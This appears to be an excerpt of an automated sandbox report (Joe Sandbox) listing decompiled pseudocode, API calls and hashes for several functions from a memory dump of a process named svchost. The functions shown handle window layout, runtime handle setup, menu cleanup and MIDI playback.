							E00489A84( *((intOrPtr*)(_t162 + 0x10)), _t162 + 0x18);
							_t71 =  *((intOrPtr*)(_t162 + 0x24));
							_t150 = _t71 -  *((intOrPtr*)(_t162 + 0x1c));
							__eflags = _t139 - _t71;
							if(_t139 != _t71) {
								__eflags =  *((intOrPtr*)(_t162 + 0x20)) -  *((intOrPtr*)(_t162 + 0x20));
								 *((intOrPtr*)(_t162 + 0x2c)) = _t139;
								 *((intOrPtr*)(_t162 + 0x30)) = _t139 - _t150;
								E00487591(_t159,  *((intOrPtr*)(_t162 + 0x20)), _t139 - _t150,  *((intOrPtr*)(_t162 + 0x20)) -  *((intOrPtr*)(_t162 + 0x20)), _t139 - _t139 - _t150, 1);
							}
							_t139 = _t139 - _t150;
							_t103 = _t103 - 1;
							__eflags = _t103;
						} while (_t103 >= 0);
						goto L22;
					} else {
						goto L14;
					}
					do {
						L14:
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x44)) + _t100 * 4));
						GetWindowRect( *( *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x44)) + _t100 * 4)) + 0x1c), _t162 + 0x18);
						E00489A84( *((intOrPtr*)(_t162 + 0x14)), _t162 + 0x18);
						_t78 =  *((intOrPtr*)(_t162 + 0x1c));
						_t142 =  *((intOrPtr*)(_t162 + 0x24)) - _t78;
						__eflags = _t146 - _t78;
						if(_t146 != _t78) {
							 *((intOrPtr*)(_t162 + 0x24)) = _t142 + _t146;
							__eflags =  *((intOrPtr*)(_t162 + 0x20)) -  *((intOrPtr*)(_t162 + 0x20));
							 *((intOrPtr*)(_t162 + 0x24)) = _t146;
							E00487591(_t160,  *((intOrPtr*)(_t162 + 0x20)), _t146,  *((intOrPtr*)(_t162 + 0x20)) -  *((intOrPtr*)(_t162 + 0x20)), _t142 + _t146 - _t146, 1);
						}
						_t146 = _t146 + _t142;
						_t100 = _t100 - 1;
						__eflags = _t100;
					} while (_t100 >= 0);
					_t157 =  *((intOrPtr*)(_t162 + 0x10));
					goto L18;
				}
				while(1) {
					_t12 =  *((intOrPtr*)(_t162 + 0x14)) + 0x14; // 0x14
					_t151 = E004135B0(_t12, _t96, 0);
					if(_t151 == 0) {
						goto L13;
					}
					_t124 =  *_t151;
					_t85 = E00418A40(0x3ea,  *_t151, 0);
					if(_t85 == 0 || ( *(_t85 + 0x14) & 0x00100000) == 0) {
						L12:
						_t96 = _t96 + 1;
						continue;
					} else {
						_t152 = _t151 + 0x18;
						_t153 = _t152 + E0040C020(_t124, _t152);
						_t87 = E0040C020(_t124, _t153);
						_t162 = _t162 + 8;
						_t155 =  *((intOrPtr*)(_t153 + _t87));
						if(_t155 == 0 || IsWindow( *(_t155 + 0x1c)) == 0) {
							goto L12;
						} else {
							SendMessageA( *(_t155 + 0x1c), 0x8003, 0, 0);
							_t92 = E004874EA(_t155) & 0x00000003;
							if(_t92 != 1) {
								__eflags = _t92 - 3;
								if(_t92 == 3) {
									E0040B860(_t162 + 0x2c, _t155, _t155);
								}
								goto L12;
							}
							E0040B860(_t162 + 0x40, _t155, _t155);
							_t96 = _t96 + 1;
							continue;
						}
					}
				}
				goto L13;
			}
























    0x0041ea90
    0x0041ea92
    0x0041ea97
    0x0041ea9d
    0x0041ea9e
    0x0041eaa5
    0x0041eaaa
    0x0041eaac
    0x0041eaae
    0x0041eab2
    0x0041eab8
    0x0041eccf
    0x0041ecd5
    0x0041ecdf
    0x0041ecdf
    0x0041eac4
    0x0041eace
    0x0041ead6
    0x0041eada
    0x0041eadf
    0x0041eaea
    0x0041eb0b
    0x0041ebb9
    0x0041ebbd
    0x0041ebc2
    0x0041ebc2
    0x0041ebc3
    0x0041ec24
    0x0041ec2d
    0x0041ec37
    0x0041ec3e
    0x0041ec3e
    0x0041ec3f
    0x0041eca1
    0x0041ecaa
    0x0041ecaf
    0x0041ecb3
    0x0041ecbc
    0x0041ecc4
    0x0041ecc8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041ec41
    0x0041ec41
    0x0041ec4a
    0x0041ec51
    0x0041ec60
    0x0041ec65
    0x0041ec6f
    0x0041ec71
    0x0041ec73
    0x0041ec88
    0x0041ec8a
    0x0041ec93
    0x0041ec97
    0x0041ec97
    0x0041ec9c
    0x0041ec9e
    0x0041ec9e
    0x0041ec9e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041ebc5
    0x0041ebc5
    0x0041ebce
    0x0041ebd5
    0x0041ebe4
    0x0041ebed
    0x0041ebf1
    0x0041ebf3
    0x0041ebf5
    0x0041ebfe
    0x0041ec0d
    0x0041ec0f
    0x0041ec16
    0x0041ec16
    0x0041ec1b
    0x0041ec1d
    0x0041ec1d
    0x0041ec1d
    0x0041ec20
    0x00000000
    0x0041ec20
    0x0041eb17
    0x0041eb1e
    0x0041eb26
    0x0041eb2a
    0x00000000
    0x00000000
    0x0041eb30
    0x0041eb3a
    0x0041eb41
    0x0041ebb3
    0x0041ebb3
    0x00000000
    0x0041eb4c
    0x0041eb4c
    0x0041eb55
    0x0041eb58
    0x0041eb5f
    0x0041eb62
    0x0041eb66
    0x00000000
    0x0041eb76
    0x0041eb83
    0x0041eb8c
    0x0041eb92
    0x0041eba4
    0x0041eba7
    0x0041ebae
    0x0041ebae
    0x00000000
    0x0041eba7
    0x0041eb99
    0x0041eb9e
    0x00000000
    0x0041eb9e
    0x0041eb66
    0x0041eb41
    0x00000000

    APIs
    • IsWindow.USER32(?), ref: 0041EB6C
    • SendMessageA.USER32(?,00008003,00000000,00000000), ref: 0041EB83
    • GetWindowRect.USER32(?,00000000), ref: 0041EBD5
    • GetClientRect.USER32(?,00000000), ref: 0041EC2D
    • GetWindowRect.USER32(?,00000000), ref: 0041EC51
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: RectWindow$ClientMessageSend
    • String ID:
    • API String ID: 1071774122-0
    • Opcode ID: 218b6507bebca5f1521e79dd105ed75d108315d3206bc26d02c369229a79139a
    • Instruction ID: c3ecebb496dc53ac50e4da2302c7bea0a928e615a052645fe8566d31972ee628
    • Opcode Fuzzy Hash: 218b6507bebca5f1521e79dd105ed75d108315d3206bc26d02c369229a79139a
    • Instruction Fuzzy Hash: 5C61A075608355AFC710DF26C880AABB7E8EB84744F004A1EF98597381DB78ED45CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00474A12 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
    Download Yara Rule
    C-Code - Quality: 99%
    			E00474A12() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00471697(0x480);
				if(_t89 == 0) {
					E0046FE64(0x1b);
				}
				 *0x4e1ca0 = _t89;
				 *0x4e1da0 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x4e1ca0; // 0x4d010a8
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x4e1ca0; // 0x4d010a8
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x4e1da0);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x4e1da0 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x4e1ca0[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x4e1ca4;
					while(1) {
						_t69 = E00471697(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x4e1da0 =  *0x4e1da0 + 0x20;
						__eflags =  *0x4e1da0;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x4e1da0 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x4e1da0; // 0x20
					goto L18;
				}
			}




























    0x00474a25
    0x00474a2a
    0x00474a2e
    0x00474a33
    0x00474a34
    0x00474a3a
    0x00474a44
    0x00474a44
    0x00474a4a
    0x00474a4e
    0x00474a52
    0x00474a55
    0x00474a59
    0x00474a5d
    0x00474a62
    0x00474a65
    0x00474a65
    0x00474a70
    0x00474a76
    0x00474a7b
    0x00474b52
    0x00474b52
    0x00474b52
    0x00474b54
    0x00474b54
    0x00474b5a
    0x00474b5d
    0x00474b61
    0x00474b64
    0x00474bb3
    0x00474bb3
    0x00474bb3
    0x00000000
    0x00474bb3
    0x00474b66
    0x00474b68
    0x00474b6c
    0x00474b78
    0x00474b7a
    0x00474b7a
    0x00474b6e
    0x00474b70
    0x00474b70
    0x00474b84
    0x00474b86
    0x00474b89
    0x00474ba2
    0x00474ba2
    0x00474b8b
    0x00474b8c
    0x00474b92
    0x00474b94
    0x00000000
    0x00000000
    0x00474b96
    0x00474b9b
    0x00474b9d
    0x00474ba0
    0x00474ba8
    0x00474bab
    0x00474bad
    0x00474bad
    0x00000000
    0x00474bab
    0x00000000
    0x00474ba0
    0x00474bb7
    0x00474bb7
    0x00474bb8
    0x00474bb8
    0x00474bcd
    0x00474bcd
    0x00474a81
    0x00474a84
    0x00474a86
    0x00000000
    0x00000000
    0x00474a8c
    0x00474a8e
    0x00474a94
    0x00474a9c
    0x00474a9e
    0x00474aa0
    0x00474aa0
    0x00474aa2
    0x00474aa8
    0x00474b00
    0x00474b00
    0x00474b02
    0x00474b04
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00474b06
    0x00474b06
    0x00474b09
    0x00474b0b
    0x00474b0e
    0x00000000
    0x00000000
    0x00474b10
    0x00474b12
    0x00474b14
    0x00000000
    0x00000000
    0x00474b16
    0x00474b18
    0x00474b25
    0x00474b2c
    0x00474b2c
    0x00474b39
    0x00474b41
    0x00474b45
    0x00000000
    0x00474b45
    0x00474b1b
    0x00474b21
    0x00474b23
    0x00000000
    0x00000000
    0x00000000
    0x00474b48
    0x00474b48
    0x00474b4c
    0x00474b4d
    0x00474b4e
    0x00474b4e
    0x00000000
    0x00474aaa
    0x00474aaa
    0x00474aaf
    0x00474ab4
    0x00474ab9
    0x00474abc
    0x00000000
    0x00000000
    0x00474abe
    0x00474abe
    0x00474ac5
    0x00474ac7
    0x00474ac7
    0x00474acd
    0x00474acd
    0x00474acf
    0x00000000
    0x00000000
    0x00474ad1
    0x00474ad5
    0x00474ad8
    0x00474adc
    0x00474ae2
    0x00474ae5
    0x00474ae5
    0x00474aed
    0x00474af0
    0x00474af6
    0x00000000
    0x00000000
    0x00000000
    0x00474af8
    0x00474afa
    0x00000000
    0x00474afa

    APIs
    • GetStartupInfoA.KERNEL32(?), ref: 00474A70
    • GetFileType.KERNEL32(?,?,00000000), ref: 00474B1B
    • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00474B7E
    • GetFileType.KERNEL32(00000000,?,00000000), ref: 00474B8C
    • SetHandleCount.KERNEL32 ref: 00474BC3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: FileHandleType$CountInfoStartup
    • String ID:
    • API String ID: 1710529072-0
    • Opcode ID: 02b5e9d278c2a490232e65fabb22e76456600c2ea441d755afe35da5ddf5d6b6
    • Instruction ID: c92269a868fe239951940312916863b04533c493ba96912ee8b532712e3f3691
    • Opcode Fuzzy Hash: 02b5e9d278c2a490232e65fabb22e76456600c2ea441d755afe35da5ddf5d6b6
    • Instruction Fuzzy Hash: 2451E7315402458FC721CB28C8847BA77E0AB91368F29C67FD5AADB2E1D738ED05C759
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041CBB0 Relevance: 7.6, APIs: 5, Instructions: 104windowCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0041CBB0(void* __ecx) {
				struct HMENU__* _v4;
				struct HMENU__* _v8;
				struct HMENU__* _v32;
				int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				char _v60;
				struct HMENU__* _t29;
				void* _t40;
				void* _t42;
				void* _t44;
				void* _t58;
				struct HMENU__* _t60;
				intOrPtr* _t61;
				void* _t62;
				void* _t66;

				_t66 =  &_v48;
				_t58 = __ecx;
				E0048538E(__ecx);
				_t67 =  *((intOrPtr*)(_t58 + 0xd8));
				if( *((intOrPtr*)(_t58 + 0xd8)) == 0 && E00413AB0(E00418A40(0x3e9, 0, 0), _t67,  *((intOrPtr*)(_t58 + 0xdc)),  &_v60, 0) == 1) {
					_t44 = 0;
					while(1) {
						_t61 = E004135B0(_v48 + 0x14, _t44, 0);
						if(_t61 == 0) {
							goto L8;
						}
						_t52 =  *_t61;
						_t40 = E00418A40(0x3ea,  *_t61, 0);
						if(_t40 != 0 && ( *(_t40 + 0x14) & 0x00080000) != 0) {
							_t62 = _t61 + 0x18;
							_t63 = _t62 + E0040C020(_t52, _t62);
							_t42 = E0040C020(_t52, _t62 + E0040C020(_t52, _t62));
							_t66 = _t66 + 8;
							E0042AB10( *((intOrPtr*)(_t63 + _t42)) + 0x5c);
						}
						_t44 = _t44 + 1;
					}
				}
				L8:
				_v44 =  *((intOrPtr*)(_t58 + 0xdc));
				_v40 =  *((intOrPtr*)(_t58 + 0xe0));
				_v36 = 2;
				_v32 = 0;
				_v8 = 0;
				_v4 = 0;
				E00418A40(0x7d8,  &_v44, 0);
				_t29 = IsWindow( *(_t58 + 0x1c));
				__eflags = _t29;
				if(_t29 != 0) {
					__eflags =  *((intOrPtr*)(_t58 + 0xe4)) - 1;
					if( *((intOrPtr*)(_t58 + 0xe4)) == 1) {
						WinHelpA( *(_t58 + 0x1c), 0, 2, 0);
						 *((intOrPtr*)(_t58 + 0xe4)) = 0;
					}
					_t60 = GetMenu( *(_t58 + 0x1c));
					SetMenu( *(_t58 + 0x1c), 0);
					__eflags = _t60;
					if(_t60 != 0) {
						DestroyMenu(_t60);
					}
					return E0041BEB0(_t58, 0, 0);
				}
				return _t29;
			}




















    0x0041cbb0
    0x0041cbb7
    0x0041cbb9
    0x0041cbc6
    0x0041cbc8
    0x0041cbef
    0x0041cbf1
    0x0041cbff
    0x0041cc03
    0x00000000
    0x00000000
    0x0041cc05
    0x0041cc0e
    0x0041cc15
    0x0041cc20
    0x0041cc29
    0x0041cc2c
    0x0041cc36
    0x0041cc3c
    0x0041cc3c
    0x0041cc41
    0x0041cc41
    0x0041cbf1
    0x0041cc44
    0x0041cc5e
    0x0041cc62
    0x0041cc66
    0x0041cc6e
    0x0041cc72
    0x0041cc76
    0x0041cc7a
    0x0041cc80
    0x0041cc86
    0x0041cc88
    0x0041cc8a
    0x0041cc91
    0x0041cc9b
    0x0041cca1
    0x0041cca1
    0x0041ccb6
    0x0041ccb8
    0x0041ccbe
    0x0041ccc0
    0x0041ccc3
    0x0041ccc3
    0x00000000
    0x0041cccd
    0x0041ccd9

    APIs
    • IsWindow.USER32(?), ref: 0041CC80
    • WinHelpA.USER32(?,00000000,00000002,00000000), ref: 0041CC9B
    • GetMenu.USER32(?), ref: 0041CCAB
    • SetMenu.USER32(?,00000000), ref: 0041CCB8
    • DestroyMenu.USER32(00000000), ref: 0041CCC3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Menu$DestroyHelpWindow
    • String ID:
    • API String ID: 427501538-0
    • Opcode ID: 1473411f23f01daa8169ef2d679f95db0780e2fd014171c28812189152ac4253
    • Instruction ID: 0577d15065a1ae1e11a822a269331571f66a33f88e753ef4b39ff7707a26b424
    • Opcode Fuzzy Hash: 1473411f23f01daa8169ef2d679f95db0780e2fd014171c28812189152ac4253
    • Instruction Fuzzy Hash: 6331C371600205ABC314AF66CC85AABB7ACEF45348F05461FF90993240EB79BC8487E9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00428550 Relevance: 7.6, APIs: 5, Instructions: 103synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00428550(intOrPtr* __ecx) {
				intOrPtr _v4;
				void* __ebx;
				intOrPtr _t23;
				int _t25;
				int _t27;
				int _t33;
				int _t38;
				struct HMIDISTRM__* _t58;
				intOrPtr* _t59;

				_t59 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x18)) != 0 ||  *((intOrPtr*)(__ecx + 0x50)) != 0xc8) {
					_t23 =  *((intOrPtr*)(_t59 + 0x50));
					 *((intOrPtr*)(_t59 + 0x4c)) = 0;
					 *((intOrPtr*)(_t59 + 0x18)) = 0;
					if(_t23 != 0xc8 && _t23 != 0x12c) {
						 *((intOrPtr*)(_t59 + 0x50)) = 0x64;
					}
					_t25 = midiStreamStop( *(_t59 + 0x1c));
					if(_t25 == 0) {
						_t27 = midiOutReset( *(_t59 + 0x1c));
						if(_t27 == 0) {
							if(WaitForSingleObject( *(_t59 + 0x54), 0x7d0) == 0x102) {
								 *((intOrPtr*)(_t59 + 0x50)) = 0xc8;
							}
							if( *((intOrPtr*)(_t59 + 0x50)) != 0xc8) {
								goto L23;
							} else {
								goto L12;
							}
						} else {
							 *((intOrPtr*)( *_t59 + 4))(_t27);
							return 0;
						}
					} else {
						 *((intOrPtr*)( *_t59 + 4))(_t25);
						return 0;
					}
				} else {
					L12:
					 *((intOrPtr*)(_t59 + 0x50)) = 0;
					E004291A0(0, _t59);
					_t58 =  *(_t59 + 0x1c);
					 *(_t59 + 0x1c) = 0;
					if(_v4 == 0) {
						L20:
						if(_t58 != 0) {
							_t33 = midiStreamClose(_t58);
							if(_t33 != 0) {
								 *((intOrPtr*)( *_t59 + 4))(_t33);
							}
						}
						L23:
						return 1;
					} else {
						if(E00428EB0(_t59) != 0) {
							if( *((intOrPtr*)(_t59 + 0x24)) == 0) {
								E004286A0(_t59);
								 *((intOrPtr*)(_t59 + 0x20)) = 0;
								 *((intOrPtr*)(_t59 + 0x94)) = 0;
							}
							goto L20;
						} else {
							if(_t58 != 0) {
								_t38 = midiStreamClose(_t58);
								if(_t38 != 0) {
									 *((intOrPtr*)( *_t59 + 4))(_t38);
								}
							}
							return 0;
						}
					}
				}
			}












    0x00428552
    0x0042855f
    0x00428566
    0x00428569
    0x0042856e
    0x00428571
    0x0042857a
    0x0042857a
    0x00428585
    0x0042858d
    0x004285a3
    0x004285ab
    0x004285d1
    0x004285d3
    0x004285d3
    0x004285d9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004285ad
    0x004285b2
    0x004285ba
    0x004285ba
    0x0042858f
    0x00428594
    0x0042859c
    0x0042859c
    0x004285db
    0x004285db
    0x004285dd
    0x004285e0
    0x004285e9
    0x004285ee
    0x004285f1
    0x00428632
    0x00428634
    0x00428637
    0x0042863f
    0x00428646
    0x00428646
    0x0042863f
    0x0042864b
    0x00428651
    0x004285f3
    0x004285fc
    0x00428620
    0x00428624
    0x00428629
    0x0042862c
    0x0042862c
    0x00000000
    0x004285fe
    0x00428600
    0x00428603
    0x0042860b
    0x00428612
    0x00428612
    0x0042860b
    0x0042861a
    0x0042861a
    0x004285fc
    0x004285f1

    APIs
    • midiStreamStop.WINMM(?,00000000,?,00000000,004280BA,00000000,^I,0041AB16,^I,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 00428585
    • midiOutReset.WINMM(?,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 004285A3
    • WaitForSingleObject.KERNEL32(?,000007D0,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 004285C6
    • midiStreamClose.WINMM(?,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 00428603
    • midiStreamClose.WINMM(?,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 00428637
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: midi$Stream$Close$ObjectResetSingleStopWait
    • String ID:
    • API String ID: 3142198506-0
    • Opcode ID: 72a9eb2536bf08810aedc27b9a7359a6a8fe9a4eb956fb087a1284a0480b7979
    • Instruction ID: be9cff906f6c39f953605146a2aa9babaccdd9a656a4764836de9b09acad3106
    • Opcode Fuzzy Hash: 72a9eb2536bf08810aedc27b9a7359a6a8fe9a4eb956fb087a1284a0480b7979
    • Instruction Fuzzy Hash: 01313EB27017619BCB309F65E48851FB7E5BB943057544A3FE142C6641CB78EC868B98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041E920 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E0041E920(void* __ecx, struct HWND__* _a4) {
				struct tagRECT _v16;
				struct tagPOINT _v24;
				struct tagPOINT _v28;
				struct HWND__* _t19;
				void* _t22;
				int _t35;
				struct HWND__* _t48;
				void* _t49;
				void* _t51;
				void* _t52;
				struct HICON__* _t54;

				_t48 = _a4;
				_t49 = __ecx;
				if(_t48 == 0) {
					L11:
					__eflags = 0;
					return 0;
				} else {
					_t19 =  *(__ecx + 0x1c);
					if(_t48 == _t19 || IsChild(_t19, _t48) != 0) {
						if(_t48 !=  *(_t49 + 0x1c)) {
							L5:
							if(E00413AB0(E00418A40(0x3e9, 0, 0), _t61,  *((intOrPtr*)(_t49 + 0xdc)),  &(_v16.right), 0) == 0) {
								goto L11;
							} else {
								if(_t48 !=  *(_t49 + 0x1c)) {
									_t22 = E00414340(_a4, _t48, 1);
